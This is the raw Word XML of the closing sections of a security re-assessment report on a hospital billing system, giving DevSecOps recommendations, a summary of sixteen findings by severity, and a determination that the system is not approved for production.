        <w:t xml:space="preserve">Beyond individual vulnerability remediation, this assessment identified a systemic gap between the deployed environment and the source code repository. The following structural recommendations address the root cause and will reduce the likelihood of similar gaps in future assessments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Establish a GitOps policy: all security fixes must be committed to the repository branch before being considered remediated. Deployment must only be performed from a validated, versioned, reviewed commit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement a pre-commit framework (pre-commit.com) with detect-secrets and bandit plugins to automatically scan for hardcoded secrets and Python security anti-patterns before every commit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Enable GitHub Secret Scanning (Settings &gt; Code Security and Analysis) to receive automated alerts for any future credential exposure in commits or pull requests.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Add a mandatory SAST step to the GitHub Actions CI/CD pipeline. Use Bandit for Python security scanning and eslint-plugin-security for JavaScript. Fail the pipeline on findings of Medium severity or above.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Establish a security review gate on all pull requests that introduce new file upload functionality, modify authentication or authorisation logic, or change CORS / security header configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Formalise a Secrets Management approach: use a dedicated secrets management service or at minimum enforce that all sensitive values are injected at runtime via environment variables with no application-level defaults.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Conduct a quarterly VAPT re-assessment cycle to maintain visibility into the evolving security posture as new features are introduced.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">8.  Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">This re-assessment of the Hospital Billing System has identified sixteen (16) security findings across Critical (2), High (4), Medium (8), and Low (2) severity levels. The most significant risk concentrations are: the persistence of all prior findings in the source code repository indicating a fundamental DevSecOps process failure, and the introduction of multiple exploitable vulnerabilities in the new bulk upload feature.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The bulk upload feature, in particular, exhibits a cluster of four independently exploitable vulnerabilities. This feature must remain disabled or inaccessible to end users until findings V-04, V-05, V-07, and V-08 are fully resolved and verified through targeted re-testing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The development team is recognised for their responsiveness to prior findings and the architectural improvements made to the parsing layer. Implementing the DevSecOps recommendations in Section 7 will address the systemic root causes identified and build a more sustainable security posture for future development cycles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="FDEDEC" w:val="clear"/>
        <w:spacing w:after="100" w:before="100"/>
        <w:ind w:left="180" w:right="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">FINAL DETERMINATION: NOT APPROVED FOR PRODUCTION DEPLOYMENT. Re-assessment is required following remediation of all Critical and High severity findings (V-01 through V-06, V-14). A targeted review of Medium findings is recommended before any public-facing deployment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5DA3" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5DA3"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Document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Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="312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Name / Signature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="312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Date</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Lead Security Analyst</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Security Auditing Team</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April 23, 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="312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Review Authority</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="312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__________________________</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:gridSpan w:val="1"/>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__________________________</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Client Representative</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__________________________</w:t>
            </w:r>
          </w:p>
        </w:tc>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__________________________</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">This report is provided exclusively for the use of the named client organisation. It must not be reproduced, distributed, or disclosed to any third party without prior written consent. The findings reflect the security posture at the time of assessment only and may not account for changes made after the assessment date.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DA3" w:sz="4" w:space="2"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:after="80" w:before="60"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5D6D7E"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">Security Auditing Team  |  April 2026</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5D6D7E"/>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DA3" w:sz="4" w:space="2"/>
      </w:pBdr>
      <w:spacing w:after="60" w:before="80"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5D6D7E"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">VAPT Re-Assessment Report  |  Hospital Billing System  |  STRICTLY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DA3"/>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2026-04-22T22:34:34.812Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-22T22:34:34.813Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>